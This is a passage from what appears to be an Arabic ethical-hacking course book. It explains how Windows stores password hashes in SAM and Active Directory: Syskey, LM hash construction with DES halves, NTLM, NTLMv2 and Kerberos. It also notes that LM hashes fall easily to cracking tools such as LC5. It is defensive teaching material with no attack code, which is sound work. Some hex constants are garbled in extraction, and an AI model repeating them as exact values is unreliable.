ﺑﻌد ذﻟك أن اﻻداة Syskeyآﻣﻧﺔ ﺑﺎﻟﻘدر اﻟﻛﺎﻓﻲ ﻟﺻد اي ﻧوع ﻣن اﻻﺧﺗراﻗﺎت.
ﺣﺗﻰ ﻟو ﺗم اﻛﺗﺷﺎف اﻟﻣﺣﺗوﯾﺎت ﻣن ﻗﺑل ﺑﻌض اﻟﺣﯾل ،ﻓﺎﻧﮫ ﯾﺗم ﺗﺷﻔﯾر اﻟﻣﻔﺎﺗﯾﺢ ﺑﺎﺳﺗﺧدام اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد ،ﻣﻣﺎ ﯾﺟﻌل ﻣن اﻟﺻﻌب
ﻛﺳره .أﯾﺿﺎ ،ﺑﻌض اﻹﺻدارات ﻟدﯾﮭﺎ ﻣﻔﺗﺎح ﺛﺎﻧوي ،ﻣﻣﺎ ﯾﺟﻌل اﻟﺗﺷﻔﯾر ﻣﺣددة ﻟﮭذه اﻟﻧﺳﺧﺔ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل.
ھذا اﻟﻣﻠف ﯾﻣﻛن اﯾﺟﺎده ﻣن ﺧﻼل ھذا اﻟﻣﺳﺎر) (%SYSTEMROOT%\system32\configوﻟﻛن ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻧﮫ ﻻ ﯾﻣﻛن اﻟﺗﻌدﯾل
ﻓﯾﮫ او ﻗراءﺗﮫ او ﻧﺳﺧﮫ طﺎﻟﻣﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻌﻣل.
ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن ھذا اﻟﻣﻠف ﯾﻣﻛن اﻻطﻼع ﻋﻠﯾﮫ ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ:
http://technet.microsoft.com/library/cc723740.aspx
ﻟﻠﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﮭﺎش ﯾﻣﻛن اﻻطﻼع ﻋﻠﯾﮫ ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ:
http://en.wikipedia.org/wiki/Cryptographic_hash_function
ﻣﻠﺣوظﮫ :ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻘوم ﺑﺗﺧزﯾن ﺑﯾﺎﻧﺎت اﻟﺗﺳﺟﯾل ﻓﻲ اﻟﻣﻠف ،SAMﻟﻛن ﯾوﺟد اﺳﺗﺛﻧﺎء اﻧﮫ ﻋﻧد رﺑط اﻟﺟﮭﺎز ﺑﺎل
Active Directoryﻓﺎﻧﮫ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت). (Active Directory
ﻛﯿﻒ ﯾﺘﻢ ﺗﺨﺰﯾﻦ ھﺎش ﻛﻠﻤﺔ اﻟﻤﺮور ﻓﻲ اﻟﻤﻠﻒ (How Hash Passwords Are Stored in Window SAM) SAM؟
ﯾﺗم ﺗﺧزﯾن ﺳﺟﻼت اﻟﻣﺳﺗﺧدم ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ) (SAMأو ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت .Active Directoryوﯾرﺗﺑط ﻛل ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﻊ اﺛﻧﯾن
ﻣن ﻛﻠﻣﺎت ﻣرور :اﻷوﻟﻰ LAN Manager-compatible passwordواﻟﺛﺎﻧﯾﺔ .Windows passwordﻛل ﻛﻠﻣﺔ ﻣرور ﯾﺗم
ﺗﺷﻔﯾرھﺎ وﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت SAMأو ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت .Active Directory
The LAN Manager-compatible passwordﺗﻛون ﻣﺗواﻓﻘﺔ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗﺳﺗﺧدم .LM hashﻛﻠﻣﺔ اﻟﻣرور ھذه ﻗﺎﺋﻣﮫ
ﻋﻠﻰ .the original equipment manufacturer (OEM) characterﻛﻠﻣﺔ اﻟﻣرور ھذه ﻟﯾﺳت ﺣﺳﺎﺳﺔ ﻟﺣﺎﻟﺔ اﻷﺣرف ،وﯾﻣﻛن
أن ﯾﺻل إﻟﻰ 14ﺣرﻓﺎ ً .ﯾﻌرف أﯾﺿﺎ إﺻدار OWFﻟﻛﻠﻣﺔ اﻟﻣرور ھذه ب LAN Manager OWFأو .ESTDوﯾﺗم ﺗﺷﻔﯾر ﻛﻠﻣﺔ
اﻟﻣرور ھذه ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر .DES
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
315
(NTLM) Windows passwordﯾﺳﺗﻧد إﻟﻰ ﻣﺟﻣوﻋﺔ أﺣرف .Unicodeﻛﻠﻣﺔ اﻟﻣرور ھذه ﺣﺳﺎس ﻟﺣﺎﻟﺔ اﻷﺣرف ،وﯾﻣﻛن أن ﺗﺻل
إﻟﻰ 128ﺣرﻓﺎ ً .ﯾﻌرف أﯾﺿﺎ إﺻدار OWFﻣن ﻛﻠﻣﺔ اﻟﻣرور ھذه ب .Windows OWFﻛﻠﻣﺔ اﻟﺳر ھذه ﯾﺗم ﺣﺳﺎﺑﮭﺎ ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺔ
اﻟﺗﺷﻔﯾر .RSA MD--4
ﯾﺗم ﺗﻌطﯾل إﻧﺷﺎء وﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻋﻠﻰ ھﯾﺋﺔ valid LM hashﻓﻲ اﻟﻌدﯾد ﻣن إﺻدارات اﻟوﯾﻧدوز .ھذا ھو اﻹﻋداد اﻻﻓﺗراﺿﻲ ﻟﻧظﺎم
اﻟﺗﺷﻐﯾل Windows Vistaو LM hash .Windows 7ﯾﻣﻛن أن ﯾﻛون ﻓﺎرﻏﺎ ﻓﻲ اﻹﺻدارات اﻟﺗﻲ ﯾﻛون ﻓﯾﮭﺎ LM hashﻏﯾر ﻣﻔﻌل
) .(disabledﺗﺣدﯾد اﻟﺧﯾﺎر ﻹزاﻟﺔ LM hashﺗﻣﻛن ﻓﺣوﺻﺎت إﺿﺎﻓﯾﺔ ﺧﻼل ﻋﻣﻠﯾﺔ ﺗﻐﯾر ﻛﻠﻣﺔ اﻟﻣرور ،وﻟﻛﻧﮫ ﻻ ﯾزﯾل ﻗﯾﻣﺔ LM hash
ﻣوﺟودة ﻓﻲ اﻟﻣﻠف .SAMﺗﻔﻌﯾل ﺧﯾﺎر اﻟﻔﺣوﺻﺎت إﺿﺎﻓﯾﺔ ﯾﺧزن ﻗﯾﻣﺔ " "dummyﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت SAMوﻟﯾس ﻟﮫ ﻋﻼﻗﺔ ﺑﻛﻠﻣﺔ ﻣرور
اﻟﻣﺳﺗﺧدم وﻧﻔﺳﮫ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺟﻣﯾﻊ ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن.
ﻻ ﯾﻣﻛن ﺣﺳﺎب LM hashﻟﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗزﯾد ﻋن 14ﺣرﻓﺎ .وﺑﺎﻟﺗﺎﻟﻲ ،ﯾﺗم ﺗﻌﯾﯾن ﻗﯾﻣﺔ LM hashإﻟﻰ اﻟﻘﯾﻣﺔ " "dummyﻋﻧد ﯾﺿﻊ
The LAN manager hashھو اﻟﮭﺎش اﻷوﻟﻰ او اﻟرﺋﯾﺳﻲ اﻟذى ﯾﺳﺗﺧدﻣﮫ ﻛل ﻣن Microsoft LAN Managerو Microsoft
Windowsﻟﺗﺧزﯾن ﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدﻣﯾن ذات طول ﺣﺗﻰ 14ﺣرﻓﺎ ) .(length up to 14 characterﻣﺳﺗﺧدم ﻓﻲ ﺟﻣﯾﻊ
إﺻدارات ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز ﻗﺑل إﻟﻰ . Windows NTواﺳﺗﻣرت ﻓﻲ اﻹﺻدار اﻷﺣدث ﻣن Windowsﻣن أﺟل اﻟﺗواﻓﻘﯾﺔ ،وﻟﻛن ﯾﺗم
اﻟﺗوﺻﯾﺔ ﻣن ﻗﺑل ﻣﺎﯾﻛروﺳوﻓت ﻟﻠﻣﺳﺋول ﻟﯾﺗم إﯾﻘﺎﻓﮫ.
Microsoft Windows NTﯾﻌﻣل ﻋﻠﻰ ﺗﺧزﯾن ﻧوﻋﯾن ﻣن ﻛﻠﻣﺎت اﻟﻣرور LAN Manager (LM) password :و Windows NT
.passwordﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﻟﻧﻔﺗرض ان ﻛﻠﻣﺔ اﻟﺳر ھو ' .‘ 123456qwertyﻋﻧدﻣﺎ ﯾﺗم ﺗﺷﻔﯾر ﻛﻠﻣﺔ اﻟﻣرور ھذه ﻣﻊ ﺧوارزﻣﯾﺔ ،LM
ﻓﺎﻧﮫ ﯾﺗم ﺗﺣوﯾﻠﮭﺎ أوﻻ إﻟﻰ أﺣرف ﻛﺑﯾرة .‘ 123456QWERTY’ :إذا ﻛﺎن طول ﻛﻠﻣﺔ اﻟﻣرور ﻟﯾس 14ﺣرﻓﺎ ،ﻓﺎﻧﮫ ﯾﺗم ﺗﻌﺑﺋﺔ ﻣﻊ أﺣرف
ﻓﺎرﻏﺔ ) (Null\blank characterﻟﺟﻌل طوﻟﮭﺎ 14ﺣرﻓﺎ .ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﻔﺗرض ان ﺗﺻﺑﺢ اﻟﻛﻠﻣﺔ ﻛﺎﻻﺗﻰ '_.’123456QWERTY
ﻗﺑل ﺗﺷﻔﯾر ،ﯾﺗم ﺗﻘﺳﯾم اﻷﺣرف 14ﻣن ﻛﻠﻣﺎت اﻟﻣرور إﻟﻰ ﻧﺻﻔﯾن ذات ﻣﺳﺎﺣﺔ .7 byteوھذا ﯾﻌﻧﻲ ﺳﻠﺳﻠﺔ اوﻟﻰ ﺳﺑﻌﺔ ﺑﺎﯾت ﻣﻊ
’ ‘123456Qوﺳﻠﺳﻠﺔ ﺛﺎﻧﯾﺔ ﺳﺑﻌﺔ اﻟﺑﺎﯾت ﻣﻊ ' _ .‘ WERTYﺛم ﯾﺗم ﺗﺷﻔﯾر ﻛل ﺳﻠﺳﻠﺔ ﻋﻠﻰ ﺣدة واﻟﻧﺗﺎﺋﺞ ﯾﻛون ﻣﺗﺻﻼ ﻛﺎﻻﺗﻰ:
ﻣن ﻛل ﻧﺻف اﻟﺳﺑﻌﺔ ﺑﺎﯾت ،ﯾﺗم ﺗﺷﯾد ﻣﻔﺗﺎح DESﺛﻣﺎﻧﯾﺔ ﺑﺎﯾت .ﯾﺗم ﺗﺷﻔﯾر ﻣﻔﺗﺎح DESﺛﻣﺎﻧﯾﺔ ﺑﺎﯾت ﻣﻊ " ." magic numberﺛم ﯾﺗم
ﺗوﺻﯾل ﻧﺗﺎﺋﺞ اﻟﺗﺷﻔﯾر ﻣﻊ " " magic numberﻟﺗﻛوﯾن ھﺎش ذات اﺗﺟﺎه واﺣد ﻣن 16ﺑﺎﯾت .ھذه اﻟﻘﯾﻣﺔ ھﻲ اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد
)(LAN Managerﻟﻛﻠﻣﺔ اﻟﻣرور .ﺣﯾث ﯾﺗم اﺷﺗﻘﺎق ال 8ﺑﺎﯾت اﻷوﻟﻰ ﻣن 7أﺣرف اﻷوﻟﻰ ﻟﻛﻠﻣﺔ اﻟﻣرور وﯾﺗم اﺷﺗﻘﺎق 8ﺑﺎﯾت اﻟﺛﺎﻧﯾﺔ ﻣن
ﺧﻼل اﻟﺣرف 8أﺣرف ﻟﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻛون ﻣن 14ﺣرف .ﻣﻌﺎ ﯾﻘوﻣوا ﺑﺗﺷﯾﯾد ﻗﯾﻣﺔ اﻟﮭﺎش ذات اﻻﺗﺟﺎه اﻟواﺣد ذات اﻟطول 16ﺑﺎﯾت .ھذا
ﻗﯾﻣﺔ اﻟﮭﺎش ﻟﻛﻠﻣﺔ ﻣرور ﻻ ﺗﺗﺟﺎوز 14ﺣرف.
إذا ً ،إذا ﻛﺎﻧت ﻛﻠﻣﺔ اﻟﻣرور ﻋﺑﺎره ﻋن 7أﺣرف او اﻗل ،ﻓﺈن اﻟﻧﺻف اﻟﺛﺎﻧﻲ ھو داﺋﻣﺎ . oxAAD3B435BS1404EEﻋﻧدﻣﺎ ﯾﺗم اﺳﺗﺧدام
ﻛﻠﻣﺎت اﻟﻣرور ،LMﻓﻣن اﻟﺳﮭل ﻋﻠﻰ ﻣﮭﺎﺟﻣﻲ ﻛﻠﻣﺎت اﻟﻣرور اﻟﻛﺷف ﻋن اﻟﺣروف اﻟﺛﺎﻣﻧﺔ ،إذا ﻛﺎن ﻣوﺟودا .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،إذا ﻛﺎن
اﻟﻣﺳﺗﺧدم ﻟدﯾﮫ ﻛﻠﻣﺔ ﻣرور ﻟﮭﺎش LMﻣن ، OxC23413A8A1E7665f AAD3B435B51404EEﻓﺎن ﺗطﺑﻖ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور
LC5ﯾﻛﺷف ﻋن ﻛﻠﻣﺔ اﻟﺳر ﺑﺎﺳم " " WELCOMEﻣﻊ اﻟﻘﻠﯾل ﺟدا ﻣن اﻟﺟﮭد.
ﻟﺣﺳن اﻟﺣظ ،واﺟﮭت ﻣﺎﯾﻛروﺳوﻓت ھذه اﻟﻘﺿﺎﯾﺎ واﺳﺗﺧدﻣت اﻵن ﺧوارزﻣﯾﺔ أﻛﺛر أﻣﻧﺎ ودﻋت ﻹﻧﺷﺎء ھﺎش ﻣن اﻟﻧوع NTLMﻟﻛﻠﻣﺔ اﻟﻣرور
اﻟﺧﺎﺻﺔ ﺑﮫ .وﻣﻊ ذﻟك ،ﻓﺎن ﻣﺧﺗﺑر اﻻﺧﺗراق ،ﺳوف ﻻ ﯾزال ﯾﺟد اﻟﻧظم اﻟﺗﻲ ﻣﺎ زاﻟت ﺗﺳﺗﺧدم وﺗﺧزن .LM hashاﻹﺻدارات اﻟﺣدﯾﺛﺔ ﻣن
وﯾﻧدوز ﻻ ﺗﺳﺗﺧدم أو ﺗﺧزﯾن LM hashاﻓﺗراﺿﯾﺎ؛ وﺣﺗﻰ ﻣﻊ ذﻟك ،ھﻧﺎك ﺧﯾﺎرات ﻟﺗﻣﻛﯾن LM hashﻋﻠﻰ ھذه اﻷﻧظﻣﺔ .وﯾﺗم ﺗﻧﻔﯾذ ھذه
"اﻟﻣﯾزة" ﻟدﻋم اﻟﺗواﻓﻖ ﻣﻊ اﻟﻧظم اﻟﻘدﯾﻣﺔ .ﻛﻣﻼﺣظﺔ ﺟﺎﻧﺑﯾﺔ ،ﯾﺟب ﻋﻠﯾك داﺋﻣﺎ اﻟﺗرﻗﯾﺔ ،أو اﻟﺗوﻗف ﻋن اﺳﺗﺧدام أي ﻣن اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗطﻠب ﻣﻧك
اﺳﺗﺧدام .LM hashاﻷﻧظﻣﺔ اﻟﻘدﯾﻣﺔ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﺿﻊ اﻟﺷﺑﻛﺔ ﺑﺄﻛﻣﻠﮭﺎ ﻟﻠﺧطر.
ﻛﻠﻣﺔ اﻟﻣرور LAN Manager OWFﻗد ﺗﺻل اﻟﻰ 16ﺑﺎﯾت ﻋﻛس LMاﻟﻌﺎدﯾﺔ اﻟﺗﻲ ﺗﺻل اﻟﻰ 14ﺑﺎﯾت ﻓﻘط .ﺣﯾث 7أﺣرف ﻣن ﻛﻠﻣﺔ
اﻟﻣرور اﻷوﻟﻰ ﺗﺳﺗﺧدم ﻹﻧﺷﺎء 8ﺑﺎﯾت اﻷوﻟﻰ ﻣن LAN Manager OWFوﺗﺳﺗﺧدم 7أﺣرف اﻟﺛﺎﻧﯾﺔ ﻣن ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ إﻧﺷﺎء 8ﺑﺎﯾت
ﻣن .LAN Manager OWF
NTLMv2ھو ﺑروﺗوﻛول ﻣﺻﺎدﻗﺔ اﻟﺗوﺛﯾﻖ/اﻻﺳﺗﺟﺎﺑﺔ) (challenge/response authenticationواﻟﺗﻲ ﺗﻘدم ﺗﺣﺳن ﻟﻸوﺿﺎع اﻷﻣﻧﯾﺔ
ﻋﺑر ﺑروﺗوﻛول LMاﻟﺗﻲ ﻋﻔﺎ ﻋﻠﯾﮭﺎ اﻟزﻣن .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺈن ھذه اﻟﻧظم ﻟدﯾﮭﺎ ﻣﺳﺗوى ﻟﺿﺑط ﻣﺻﺎدﻗﺔ LAN Managerإﻟﻰ
.Send NTLMv2 responses only
ﻣﺜﺎل أﺧﺮ ﻹﻧﺸﺎء ھﺎش (LM“Hash” Generation) LM
LM hashﯾطﻠﻖ ﻋﻠﯾﮫ أﯾﺿﺎ ﺑﺎﺳم LAN Manager Hashﯾﺳﺗﺧدم ﻣن ﻗﺑل اﻟﻌدﯾد ﻣن إﺻدارات ﻧظم اﻟﺗﺷﻐﯾل Windowsﻟﺗﺧزﯾن
ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ھﻲ أﻗل ﻣن 15ﺣرﻓﺎ .وﯾوﺿﺢ اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻋﻣﻠﯾﺔ ﺗوﻟﯾد LM Hashﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم). (cehpass1
ﻓﻲ ﻋﻣﻠﯾﺔ ﺗوﻟﯾد LMھﺎش ،أوﻻ ﯾﺗم ﺗﺣوﯾل أﺣرف اﻟﻛﻠﻣﺔ إذا ﻛﺎﻧت ﺻﻐﯾره إﻟﻰ أﺣرف ﻛﺑﯾرة؛ ﻓﻲ ھذا اﻟﻣﺛﺎل ،ﯾﻛون ﻧﺗﺎﺋﺞ ھذه اﻟﻌﻣﻠﯾﺔ
" ."CEHPASS1ﺛم ،ﺑﻌد ذﻟك اﻟﻧﺎﺗﺞ ،أي ،CEHPASS1ﯾﻘوم ﺑﺗﻘﺳﯾﻣﮫ إﻟﻰ ﻗﺳﻣﯾن ﻛل ﻗﺳم ﻋﺑﺎره ﻋن ﺳﺑﻊ ﺳﻼﺳل اﻷﺣرف؛ ﻓﻲ ھذا
اﻟﻣﺛﺎل ،ﻓﺎن اﻟﻧﺎﺗﺞ ﯾﻛون" " CEHPASSو" ******" 1ﺣﯾث ﯾﺣﺗوي اﻟﺳﻠﺳﻠﺔ اﻟﺛﺎﻧﯾﺔ ﺣرف واﺣد ﻓﻘط .ﻟﺟﻌل اﻟﺳﻠﺳﻠﺔ اﻟﺛﺎﻧﯾﺔ ﺳﻠﺳﻠﺔ ﺳﺑﻌﺔ
أﺣرف ،ﻧﻘوم ﺑﺗطوﯾﻠﮭﺎ ﻣﻊ اﻷﺣرف ﻓﺎرﻏﺔ ،ﺛم ﯾﺗم اﺳﺗﺧدام ﺳﻼﺳل اﻟﺳﺑﻌﺔ أﺣرف اﻻﺛﻧﯾن ﻛﻣﻔﺗﺎح ﺗﺷﻔﯾر ﻟﺗﺷﻔﯾر اﻟﻣﺣﺗوى ﺑﺎﺳﺗﺧدام ﺗﺷﻔﯾر
(Digital Encryption Standard) DESاﻟﺷﻔرات اﻟﻣﺗﻣﺎﺛﻠﺔ) . (symmetric cipherوأﺧﯾرا ،ﻹﻧﺷﺎء ھﺎش ،LMذﻟك ﻋن طرﯾﻖ
رﺑطﮭﻣﺎ ﺑﺑﻌض ) (DES-encryptionﻟﯾﺻﺑﺣﺎ ﻣﺗﺳﻠﺳﻠﯾن.
ﻟﻣﻌﺎﻟﺟﺔ اﻟﻣﺷﺎﻛل اﻟﻣوﺟودة ﻓﻲ ،NTLM1ﻋرﺿت ﺷرﻛﺔ ﻣﺎﯾﻛروﺳوﻓت NTLMاﻹﺻدار ،2ودﻋت اﺳﺗﺧداﻣﮭﺎ ﻛﻠﻣﺎ ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ.
ﯾﺳرد اﻟﺟدول اﻟﺗﺎﻟﻲ اﻟﻣﯾزات ﻣن أﺳﺎﻟﯾب اﻟﻣﺻﺎدﻗﺔ اﻟﺛﻼﺛﺔ.
NTLM Authentication
) NTLM (NT LAN Managerھو ﺑروﺗوﻛول اﻟﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ اﻟﺷﺑﻛﺎت اﻟﺗﻲ ﺗﺗﺿﻣن أﻧظﻣﺔ ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ،
وﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﻣﺳﺗﻘﻠﺔ .وﻣن ﻗﺑل اﻟﻌدﯾد ﻣن ﻣﻧﺗﺟﺎت ﻣﺎﯾﻛروﺳوﻓت ﻹﺟراء ﻣﺻﺎدﻗﺔ ) ،(challenge/responseوھو ﻧظﺎم اﻟﻣﺻﺎدﻗﺔ
اﻻﻓﺗراﺿﻲ اﻟذي ﯾﺳﺗﺧدﻣﮫ ﺟدار ﺣﻣﺎﯾﺔ ﻣﺎﯾﻛروﺳوﻓت وﻣﻧﺗﺟﺎت ﺧﺎدم اﻟﺑروﻛﺳﻲ .وﻗد ﺗم ﺗطوﯾر ھذا اﻟﺑرﻧﺎﻣﺞ ﻟﻣﻌﺎﻟﺟﺔ ﻣﺷﺎﻛل اﻟﻌﻣل ﻣﻊ ﺗﻘﻧﯾﺎت
ﺟﺎﻓﺎ ﻓﻲ ﺑﯾﺋﺔ .Microsoftوﻧظرا ﻷﻧﮫ ﻻ ﯾوﺟد أي ﻣن ﻣواﺻﻔﺎت اﻟﺑروﺗوﻛول اﻟرﺳﻣﻲ ،ﻓﻠﯾس ھﻧﺎك ﻣﺎ ﯾﺿﻣن أﻧﮫ ﯾﻌﻣل ﺑﺷﻛل ﺻﺣﯾﺢ ﻓﻲ
ﻛل ﺣﺎﻟﺔ .ﻓﻘد ﻛﺎن ﻋﻠﻰ ﺑﻌض ﻣن ﻣﻧﺗﺟﺎت وﯾﻧدوز ،ﺣﯾث ﻋﻣل ﺑﻧﺟﺎح.
ﯾﺿﯾف Microsoft Kerberosﺣزﻣﺔ أﻣﺎن أﻛﺑر أﻣﺎﻧﺎ ً ﻣن أﻧظﻣﺔ NTLMﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل .ﻋﻠﻰ اﻟرﻏم ﻣن أن Microsoft
Kerberosھو ﺑروﺗوﻛول اﻻﺧﺗﯾﺎر ،ﻟﻛن ﻻ ﯾزال ﯾﺗم دﻋم .NTLMﯾﺟب أﯾﺿﺎ اﺳﺗﺧدام NTLMﻟﻣﺻﺎدﻗﺔ ﺗﺳﺟﯾل اﻟدﺧول ﻋﻠﻰ اﻷﻧظﻣﺔ
اﻟﻣﺳﺗﻘﻠﺔ.
ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد NTLMﺗﺳﺗﻧد إﻟﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول ،وﺗﺗﺄﻟف ﻣن اﺳم اﻟدوﻣﯾن واﺳم اﻟﻣﺳﺗﺧدم،
وھﺎش ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ذات اﻻﺗﺟﺎه اﻟواﺣد .ﯾﺳﺗﺧدم NTLMﺑروﺗوﻛول ) (challenge/responseاﻟﻣﺷﻔر ﻟﻣﺻﺎدﻗﺔ ﻣﺳﺗﺧدم دون
إرﺳﺎل ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳﺗﺧدم ﻋﺑر اﻟﺳﻠك .ﺑدﻻً ﻣن ذﻟك ،ﻧظﺎم طﻠب اﻟﻣﺻﺎدﻗﺔ ﯾﺟب إﺟراء ﻋﻣﻠﯾﺔ ﺣﺳﺎﺑﯾﺔ اﻟﺗﻲ ﺗﺛﺑت أن ﻟدﯾﮭﺎ إﻣﻛﺎﻧﯾﺔ اﻟوﺻول
إﻟﻰ ﺑﯾﺎﻧﺎت اﻋﺗﻣﺎد NTLMاﻟﻣﺿﻣون.
ﯾﺗﻛون NTLM authenticationﻣن ﺑروﺗوﻛوﻟﯾن NTLM authentication protocol :و .LM authentication protocolھذه
اﻟﺑروﺗوﻛوﻻت ﺗﺳﺗﺧدم ﻣﻧﮭﺟﯾﺔ ھﺎش ﻣﺧﺗﻠﻔﺔ ﻟﺗﺧزﯾن ﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت .SAM
NTLM Authentication Protocol
اﻟﻣﻧﺗﺟﺎت اﻟﺗﻲ ﯾدﻋﻣﮭﺎ ﺑروﺗوﻛول NTMLﺗم ﻧﺷرھﺎ ﻓﻘط ﻣن ﻗﺑل ﻣﺎﯾﻛروﺳوﻓت ﺑﺳﺑب ﻋدم ﺗواﻓر اﻟﻣواﺻﻔﺎت اﻟرﺳﻣﯾﺔ ﻟﻠﺑروﺗوﻛول.
ﻧﺗﯾﺟﺔ ﻟذﻟك ،ﻓﻲ ﺑﯾﺋﺔ ﺷﺑﻛﺔ اﺗﺻﺎل ، Microsoftﻓﺄن اﻟﻣﻧﺗﺟﺎت اﻷﺧرى ) (non-MS productﻛﻠﮭﺎ ﺗﻘرﯾﺑﺎ ﺗﺟد ﺻﻌوﺑﺔ ﻓﻲ أداء ﻣﮭﺎﻣﮭﺎ
ﺑﺷﻛل ﺻﺣﯾﺢ .أﯾﺿﺎ ﻓﻲ ﺑﯾﺋﺎت ﺗطوﯾر اﻟﺑرﻣﺟﯾﺎت ﺗﻌﺎﻧﻲ ﻣن ﻧﻔس اﻟﻣﺷﻛﻠﺔ؛ ﻻ ﺗوﺟد ﻣﻠﻔﺎت ﻣﻛﺗﺑﺎت )(librariesاﻟﺗﻲ ﺗﻧﻔذ ھذا اﻟﻣﺧطط
واﻟﺗوﺛﯾﻖ ،ﻣﺎ ﻋدا ﺗﻠك اﻟﻣﺟﻣﻌﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز .ﻓﻲ ﻣﺟﺗﻣﻊ اﻟﻣﺻدر اﻟﻣﻔﺗوح ،ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻣﺷﺎرﯾﻊ اﻟﺗﻲ ﺗرﻛز ﻋﻠﻰ ﺗﻧﻔﯾذ ھذا
اﻟﺑروﺗوﻛول ،وﻟﻛن ﻣﻌظم ھذه ﺗﻣﻠك ﺟﺎﻓﺎ ﻛﺑﯾﺋﺔ ﻟﮭﺎ.
ﻋدم ﺗواﻓر ﻣﺧطط اﻟﻣﺻﺎدﻗﺔ ﻓﻲ ﻣﻧﺻﺔ اﻟﺟﺎﻓﺎ ﯾﻣﻛن أن ﯾﺳﺑب ﻣﺷﺎﻛل ﺧطﯾرة ﻓﻲ ﻣﺟﺎل ﺗطوﯾر وﻧﺷر اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻌﺎوﻧﯾﺔ اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ
ﺗﻘﻧﯾﺎت ﻣﺛل ﺧدﻣﺎت اﻟوﯾب SOAPاﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ﺑروﺗوﻛول .HTTP
ﻣﺻﺎدﻗﺔ (NTLM Authentication) NTLMھو ﻣﺧطط ) ،(challenge/responseﯾﺗﻛون ﻣن ﺛﻼث رﺳﺎﺋل ،ﯾﺷﺎر إﻟﯾﮫ ﻋﺎدة
ﻛﺎﻟﻧوع ) 1اﻟﺗﻔﺎوض] ،([negotiationواﻟﻧوع ) 2اﻟﺗﺣدي] ([challengeوﻧوع ) 3اﻟﻣﺻﺎدﻗﺔ] .([authenticationوھﻲ ﺗﻌﻣل أﺳﺎﺳﺎ
ﻣﺛل ھذا:
-1ﯾرﺳل اﻟﻌﻣﯾل رﺳﺎﻟﺔ اﻟﻧوع 1إﻟﻰ اﻟﻣﻠﻘم .أﺳﺎﺳﺎ ھذا ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﻣﯾزات اﻟﺗﻲ ﯾرﯾدھﺎ اﻟﻌﻣﯾل وطﻠﺑت ﻣن اﻟﺧﺎدم.
